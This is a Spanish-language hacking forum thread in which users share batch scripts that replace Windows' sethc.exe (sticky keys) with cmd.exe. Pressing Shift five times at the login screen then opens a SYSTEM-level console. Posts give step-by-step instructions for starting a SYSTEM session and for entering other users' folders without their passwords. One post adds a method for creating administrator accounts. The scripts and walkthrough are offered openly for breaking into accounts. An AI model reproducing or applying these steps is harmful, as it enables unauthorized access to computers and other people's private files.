USUARIO SECRETO """ SYSTEM"""

[Spiff]

Explotando el bug del syskeys
este

Para ver este enlace Registrate o Inicia Sesion

http://foro.portalhacker.net/index.php/topic,50144.0.html

cuando ya tienen hecho todo que yo lo he programado en un Batch con este codigo

Código:

c:
cd\
cd %systemroot%\system32\
copy sethc.exe backup_sethc.exe
copy cmd.exe sethc.exe
si
exit

lo escribis en el Bloc de Notas y lo guardais como bat
lo ejecutais y cuando pulseis 5 veces (despacito) la tecla shift saldra la consola
esto lo haceis en la pantalla de bienvenida y luego escribis edxplorer.exe y se inicia una sesion cuyo usuario es SYSTEM
me quede flipao al escribir explorer.exe  pues el bug lo vi en el link este

Para ver este enlace Registrate o Inicia Sesion

http://foro.portalhacker.net/index.php/topic,50144.0.html

ACTUALIZADO
Pongo unas imagenes, lo probe con windows 2003 server pero rula igual en XP
Primero creamos el BAT (esto me lo hice yo, no viene en la web del bug, alli solo viene como abrir la consola)
El BAT lo que hace es sustituir el archivo del syskeys [sethc.exe] por una copia del cmd.exe [consola comandos] poniendole de nombre sethc.exe, hace tambien un backup del sethc.exe
---

Lo guardamos como .bat como se ve en la imagen, poniendo TODOS LOS ARCHIVOS
---
Despues lo ejecutamos y saldra en un instante, que casi no se vera, esta imagen

Luego probamos a pulsar 5 veces la tecla shift [despacito no a toda maquina] y comprobamos que nos sale la consola de comandos
cerramos sesion y vemos que nos sale la imagen de bienvenida o la casilla de relleno de usuario y contraseña (mi caso) [esto da igual, funciona en las dos]
y pulsamos 5 veces la tecla shift y que salga la consola  como en la imagen

---
Escribimos explorer.exe en la consola y pulsamos enter y en unos 2 seg mas o menos
se inicia una sesion de Usuario SYSTEM como se ve en la imagen siguiente

NOTA podemos ver que la casilla de relleno del usuario y contraseña siguen alli porque si iiniciasemos sesion, se iniciaria encima de la de SYSTEM
aqui tienes privilegios de ADMIN o de SYSTEM que es lo mismo (creo)

[HolyKnight]

bastante interesante, pero podrias explicar un poco mas que hace el exploit. Ya q no veo que explotas ahi copiando 2 files...

[Spiff]

no es ningun exploit es un bug (jeje parecido) y lo explican bien en este link

Para ver este enlace Registrate o Inicia Sesion

http://foro.portalhacker.net/index.php/topic,50144.0.html

lo que hecho yo es un bat que sustituye ya esos archivos y he explicado como iniciar una cuenta de system.

Esta tarde pondre imagenes si me acuerdo ok?

PD: no tendras un manual del sign of misery no?

[WaesWaes]

buen manual

lo que no se porque tachaste la version de tu windows y despues dejaste en el ms-dos

"copyright 1985-2003"

manual del sing of mistery?? no se para que lo queres es mejor programar pero aca tenes uno


Para ver este enlace Registrate o Inicia Sesion*hack.smfhost.com/index.php/topic,5.0.html

no estoy seguro si tenes que registrarte para verlo porque yo estoy siempre conectado pero bue

[Spiff]

no funciona la web de
Para ver este enlace Registrate o Inicia Sesion
no se si tendran problemas tecnicos

[WaesWaes]

no funciona la web de
Para ver este enlace Registrate o Inicia Sesion
no se si tendran problemas tecnicos

xD esta censurada la palabra universo*hack toda juntan sino fijate el link que pusiste

bueno no sabria que decirte esta andando ahora

[SUTC]

Me he quedado sin palabras
Un bugg que la verdad me ha sorprendido...

[WaesWaes]

Para ver este enlace Registrate o Inicia Sesion

[Spiff]

que quieres decir con esa web
que lo que he puesto ya existia?
pues ese bug creo que ya no funciona y ademas yo dije la fuente al principio

Para ver este enlace Registrate o Inicia Sesion
y a partir de esto yo cree el bat que hace que sea automático lo de copiar los archivos, en vez de hacerlo manualmente

[WaesWaes]

no, lo que queria es que los demas vean eso tambien....

ya se que vos esto lo sacaste parte de el bug de H4CK3R-Z3R0

quedate tranquilo ademas en este foro se postean muchisimas cosas que ya existen

salu2222

[chpax]

estube leyendo el post que me dijiste, y creo q es lo mismo q hacer esto no??



Bat para hackear cuentas de usuario en XP

Con este .bat podras hackear cuentas de XP, por que podras entrar a los usuarios que hay en un pc y hacer todo lo que quieras y sin necesidad de saber su contraseña.

Por defecto windows XP tiene instalado una ayuda de configuracion de teclas que se activa pulsando 5 veces seguidas la tecla shift, lo que hace eso solamente es como un pequeño acceso directo a el archivo sethc.exe que esta en system32 entonces si el archivo cmd.exe lo copiamos renombramos a sethc.exe y lo volvemos a copiar y pegar por el verdadesro sethc.exe cuando pulsemos la tecla shift 5 veces tendremos un acceso a MS-DOS para no hacer tanto rollo de copiar y pegar ejecutemos este bat:

 @echo off
copy C:\WINDOWS\system32\cmd.exe c:\
cd C:\WINDOWS\system32
del sethc.exe
echo > zzz.htm
cd c:\
ren cmd.exe sethc.exe
copy sethc.exe C:\WINDOWS\system32
del sethc.exe
exit

este bat hace todo lo que te acabo de decir y aparte crea una un archivo zzz.htm que nos sera muy util al momento de hackear lu ego lo explicare.

ya que veas que pulsando 5 veces shift se abre ms-dos ya estas listo, lo que ahora deves hacer es cerrar cesion de tu usuario y donde aparecen las imagenes de los usuarios para que entres a ellos y pongas contraseña lo unico que deves hacer es pulsar 5 veces shift y que se te habra ms-dos ya despues solo tecleas para abrir el navegador:

start zzz.htm

y cuando se te abra el navegador en la barra de direcciones escribes: 

C:\Documents and Settings\aquielusuario

y pones el nombre del usuario que quieres entrar y listo tendras acceso completo a el sin necesidad de poner contraseña 

si quieres puedes abrir c:\ para copiar los archivos que quieras para despues poder entrar a tu usuario y verlos sin problemas

PD: tambien puedes crear cuentas de usuario,
cuando abras ms-dos teclea compmgmt.msc y se te abrira unas propiedades en las que podras crear usuarios como administrador y tendras acceso completo



esto no lo hice yo, lo saque de otra pag, pero tanto en este caso como en el otro post que me dijiste q lea, tenes que ingresar con tu usuario primero para tipear todo esto en msdos, y como mi usuario no tiene privilegios de administrador, no puedo hacerlo,es desir, puedo tipear todo, pero no se puede hacer por q no me permite modificar nada de windows y tampoco del system32, hay alguna otra forma de hacer esto???

[-SharK_90-]

No se permite revivir post con mas de 1 mes de antiguedad... este tiene casi 1 año de antiguedad..
por favor.. crea un nuevo tema para plantear tu duda.
Gracias

PD: El tema queda bloqueado un dia.